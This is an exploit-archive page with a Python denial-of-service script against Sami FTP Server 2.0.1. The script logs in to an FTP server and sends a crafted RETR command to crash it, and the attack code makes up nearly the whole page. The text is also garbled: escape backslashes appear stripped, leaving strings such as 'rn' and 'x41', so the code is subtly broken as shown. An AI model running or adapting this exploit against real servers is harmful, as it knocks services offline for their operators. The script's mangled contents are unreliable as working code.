[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sami FTP Server 2.0.1 - RETR Denial Of Service
# Published : 2013-06-11
# Author :
# Previous Title : Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities
# Next Title : WinAmp 5.63 - Invalid Pointer Dereference
#!/usr/bin/python
#
#
# Exploit Title: Sami FTP Server RETR Denial Of Service
# Date: 2013/6/09
# Exploit Author: Chako
# Vendor Homepage: http://www.karjasoft.com/old.php
# Software Link:
# Version: V2.0.1 (Doesn't work on V2.0.2)
# Tested on: Windows XP SP3
# Description:
# A bug discovered in Sami FTP Server allows an attacker
# to cause a Denial of Service using a specially crafted request.
import socket
import sys
USER="chako"
PASSWD="chako"
PAYLOAD="x41"
print("nn[+] Sami FTP Server RETR Denial Of Service")
print("[+] Version: V2.0.1")
print("[+] Chakonnn")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
data = s.recv(1024)
print("[-] Login to FTP Server...n")
s.send("USER " + USER + 'rn')
data = s.recv(1024)
s.send("PASS " + PASSWD + 'rn')
data = s.recv(1024)
print("[-] Sending exploit...n")
s.send("RETR " + PAYLOAD + 'rn')
s.close()
print("[!] Done! Exploit successfully sentn")